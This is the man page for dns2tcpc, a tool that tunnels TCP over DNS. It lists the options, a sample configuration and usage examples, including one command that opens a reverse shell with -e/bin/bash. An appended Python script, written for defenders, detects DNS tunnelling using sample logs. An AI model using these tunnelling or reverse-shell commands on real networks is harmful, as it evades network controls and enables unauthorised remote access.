

       dns2tcpc - A tunneling tool that encapsulates TCP traffic over DNS.


       dns2tcpc  [  -h  ]  [  -c  ] [ -z domain zone ] [ -d debug_level ] [ -r
       resource ] [ -k key ] [ -f config_file ] [ -e command ]  [  -T  request
       type ] [ -l local_port ] [ server ]


       dns2tcpc  is  a  network tool used to encapsulate TCP communications in
       DNS. When connections are received on a specific port all  TCP  traffic
       is  sent to the remote dns2tcpd server and forwarded to a specific host
       and port. Multiple connections are supported.

       dns2tcpc was written for demonstration purposes.


       -h     Help Menu

       -c     Enable DNS compression. When used, be sure that all relays and
              DNS servers support compression and actually use it.

       -z domain zone
              Use this domain as endpoint.

       -d debug level
              Change debug level. Levels available are 1, 2 or 3.

       -r resource
              Remote resource to access.

       -k key Pre-shared key used for authentication (identification).

       -f config file
              Configuration file to use.

       -T request type
              Request  type  to  use.  Actually  only KEY and TXT requests are

       -e command
              Command to execute; I/O is redirected into the tunnel.

       -l local_port
              Local port accepting incoming connections (or - for stdin on
              UNIX systems).

       -t connection timeout
              Maximum  DNS  server’s answer delay in seconds. A valid delay is
              between 1 and 240 seconds. Default is 3.

       server DNS server to use. The first entry in the resolv.conf file will
              be chosen if the server is not specified.


       By default ${HOME}/.dns2tcprc is used if no configuration file is
       specified. Here is an example:

              domain =
              resource = ssltunnel
              local_port = 4430
              enable_compression = 0
              debug_level = 1
              key = mykey
              # DNS to use
              server =


       dns2tcpc -k mykey -z mydns

              Ask the dns2tcp server to list available resources.

       ssh -oProxyCommand dns2tcpc -r ssh -l - -z  -k  mykey

              Use dns2tcp as a proxy command with ssh. We try  to  connect  to
              the ssh resource with the key ’mykey’ and the DNS mydns.

       dns2tcpc -r socat-resource -e/bin/bash -i-k mykey -z

              Use  dns2tcp as a reverse shell, the remote shell will appear on
              the socat-resource.

       dns2tcpc -d 1 -f /dev/null -r ssl-tunnel -l 2000 -k mykey -T KEY -z mydns

              Do not use the default configuration file, bind local port 2000
              and forward all the traffic to the remote ssl-tunnel resource,
              using the first debug level. Use KEY type DNS requests.
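
A defender's view of the traffic this page describes, as an added example that is not part of the original man page or the dns2tcp project: it flags client/zone pairs that send many TXT or KEY queries with long, high-entropy names. The log format, the thresholds, the two-label zone approximation and every sample name are assumptions constructed for illustration; they do not reproduce dns2tcp's actual encoding.

```python
import math
from collections import Counter, defaultdict

TUNNEL_QTYPES = {"TXT", "KEY"}  # request types named under -T on this page

# Constructed sample log, one query per line: "<client> <qtype> <qname>".
SAMPLE_LOG = """\
10.0.0.5 A www.example.org
10.0.0.5 A d3a9f0c27b61e84f5a0c9d2e7b41f6a3.cdn.example.org
10.0.0.5 TXT selector1._domainkey.example.org
10.0.0.7 TXT q1zk9x2mfa8rt0bd7wq3nh5yl6cu4vje.t.example.net
10.0.0.7 TXT m4hx0pl7vb2qc9sy5dn8kt3wf6rj1gze.t.example.net
10.0.0.7 TXT b7ty2kd9wq4ns1xh6vm0cf3lp8rg5jza.t.example.net
10.0.0.7 KEY z3lc8wr1hy6nd0gq5xk9bt2mv7fj4spe.t.example.net
10.0.0.7 TXT h9fs4mz0qk7xb2wd5tl1yc8rv3nj6gpa.t.example.net
10.0.0.7 TXT h9fs4mz0qk7xb2wd5tl1yc8rv3nj6gpa.t.example.net
10.0.0.9 TXT k2vd7qx0ms5yb9wl3hc8tf1nr6gj4zpe.u.example.com
"""

def entropy(s):
    """Shannon entropy of s in bits per character."""
    counts = Counter(s)
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def split_zone(qname, zone_labels=2):
    """Return (payload, zone); zone is the last zone_labels labels.

    Assumption: a fixed label count stands in for a public-suffix lookup.
    """
    labels = qname.rstrip(".").lower().split(".")
    return "".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])

def find_tunnel_candidates(log, min_queries=4, min_len=24, min_entropy=3.5):
    """Map (client, zone) -> number of distinct suspicious query names."""
    hits = defaultdict(set)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 3 or parts[1].upper() not in TUNNEL_QTYPES:
            continue  # malformed line, or a record type the tool does not use
        client, _, qname = parts
        payload, zone = split_zone(qname)
        # Long, random-looking names suggest encoded data, not hostnames.
        if len(payload) >= min_len and entropy(payload) >= min_entropy:
            hits[(client, zone)].add(qname.lower())
    # Repeated names are counted once; one-off lookups stay below threshold.
    return {k: len(v) for k, v in hits.items() if len(v) >= min_queries}

if __name__ == "__main__":
    for (client, zone), n in find_tunnel_candidates(SAMPLE_LOG).items():
        print(f"{client} -> {zone}: {n} distinct high-entropy TXT/KEY names")
```

The thresholds need tuning against a baseline of the resolver's normal TXT traffic before the output is used for alerting.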


       Olivier Dembour <>